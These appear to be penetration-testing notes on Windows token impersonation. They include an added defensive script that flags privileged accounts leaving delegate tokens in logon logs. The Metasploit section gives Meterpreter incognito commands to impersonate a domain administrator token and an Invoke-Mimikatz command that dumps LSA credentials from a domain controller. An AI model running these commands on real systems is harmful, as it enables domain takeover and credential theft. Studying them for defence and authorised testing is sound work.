
Token Impersonation

Overview

Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password, similar to session cookies on a website. A token is generated when a user logs on to a system or starts an RDP session, and it remains until the system is rebooted.


Types of Tokens

  • Delegate: Created for logging into a machine or RDP
  • Impersonate: Used for non-interactive authentication such as network drive mapping


Finding Tokens

Ideally, you want to find tokens of a domain administrator in order to expose additional attack vectors against the domain controller.

To move laterally across different computers on the domain, you could pass the hashes or passwords of users that have privileges across multiple systems, or compromise additional vulnerable services.
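The two token types above map directly onto the LogonType field of Windows Security event 4624: console and RDP logons leave a delegate-level token (and cached credentials) on the host, while a network logon such as a drive mapping does not. The defensive counterpart of "finding tokens" is therefore to find where privileged accounts have left such tokens. The script below is an added example, not part of the original notes: it parses a few constructed 4624 records (field names follow the real event schema, but the hosts, accounts, IPs and the tier-0 account list are assumptions for this example) and reports every tier-0 account that logged on to a non-tier-0 host with a token-leaving logon type, which is exactly the exposure that makes token impersonation on a workstation worthwhile.

```python
import re

# Logon types (event 4624 LogonType) that create a primary token and cache
# credentials in LSASS on the target host. In the page's terms these are
# the "delegate" logons: console (2), batch (4), service (5),
# RDP/RemoteInteractive (10) and cached interactive (11).
DELEGATE_LOGON_TYPES = {2, 4, 5, 10, 11}

# Network logon (3) is the page's "impersonate" case, e.g. a network drive
# mapping: no reusable credential material is left on the target.
IMPERSONATE_LOGON_TYPES = {3}

# Assumed tier-0 accounts and the hosts they are allowed to log on to.
# These values are constructed for this example; take them from your own
# Active Directory tiering model.
TIER0_ACCOUNTS = {"ad\\administrator", "ad\\da_ops"}
TIER0_HOSTS = {"dc1.ad.lab"}

# Constructed sample records in a flattened Key=Value export format.
# Not real log data; hostnames follow the page, the rest is made up.
SAMPLE_EVENTS = """\
EventID=4624 Computer=DC1.ad.lab TargetDomainName=AD TargetUserName=administrator LogonType=10 IpAddress=10.0.0.50
EventID=4624 Computer=Win10Ent1.ad.lab TargetDomainName=AD TargetUserName=administrator LogonType=10 IpAddress=10.0.0.50
EventID=4624 Computer=Win10Ent1.ad.lab TargetDomainName=AD TargetUserName=jsmith LogonType=2 IpAddress=-
EventID=4624 Computer=FS01.ad.lab TargetDomainName=AD TargetUserName=administrator LogonType=3 IpAddress=10.0.0.50
EventID=4624 Computer=FS01.ad.lab TargetDomainName=AD TargetUserName=da_ops LogonType=2 IpAddress=-
EventID=4624 Computer=Win10Ent1.ad.lab TargetDomainName=AD TargetUserName=svc_backup LogonType=5 IpAddress=-
EventID=4634 Computer=Win10Ent1.ad.lab TargetDomainName=AD TargetUserName=administrator LogonType=10 IpAddress=10.0.0.50
"""

_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Parse one flattened 'Key=Value' record into a dict with typed fields.
    Returns None for lines that carry no fields (blank or unparsable)."""
    fields = dict(_KV.findall(line))
    if not fields:
        return None
    fields["EventID"] = int(fields.get("EventID", 0))
    fields["LogonType"] = int(fields.get("LogonType", -1))
    return fields


def classify_logon(logon_type):
    """Map a 4624 LogonType onto the page's two token categories."""
    if logon_type in DELEGATE_LOGON_TYPES:
        return "delegate"
    if logon_type in IMPERSONATE_LOGON_TYPES:
        return "impersonate"
    return "other"


def find_exposed_tokens(log_text):
    """Return sorted (host, account, logon_type) tuples for tier-0 accounts
    that logged on to a non-tier-0 host with a token-leaving logon type."""
    findings = set()
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None or ev["EventID"] != 4624:
            continue  # only successful logons create tokens
        account = f'{ev["TargetDomainName"]}\\{ev["TargetUserName"]}'.lower()
        host = ev["Computer"].lower()
        if account not in TIER0_ACCOUNTS or host in TIER0_HOSTS:
            continue  # unprivileged account, or an allowed tier-0 host
        if classify_logon(ev["LogonType"]) == "delegate":
            findings.add((host, account, ev["LogonType"]))
    return sorted(findings)


if __name__ == "__main__":
    for host, account, logon_type in find_exposed_tokens(SAMPLE_EVENTS):
        print(f"{account} left a delegate token on {host} (LogonType {logon_type})")
```

On the sample data the administrator's RDP logon to the domain controller is allowed, the type-3 network logon to the file server leaves nothing to impersonate, and the two findings are the administrator's RDP session on Win10Ent1 and da_ops's console logon on FS01; those are the hosts where a local compromise would yield a domain-admin token, and the fix is to keep tier-0 accounts off them.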


Dumping Tokens with Metasploit

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token domain\\administrator

Now that we are running in the context of a domain administrator, we could use a tool like Invoke-Mimikatz to dump LSASS on the domain controller.

PS C:\ > hostname
Win10Ent1

PS C:\ > Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer DC1.ad.lab


Revert Msfconsole Shell

This reverts the Meterpreter session to its original security context, dropping the impersonated token.

meterpreter > revself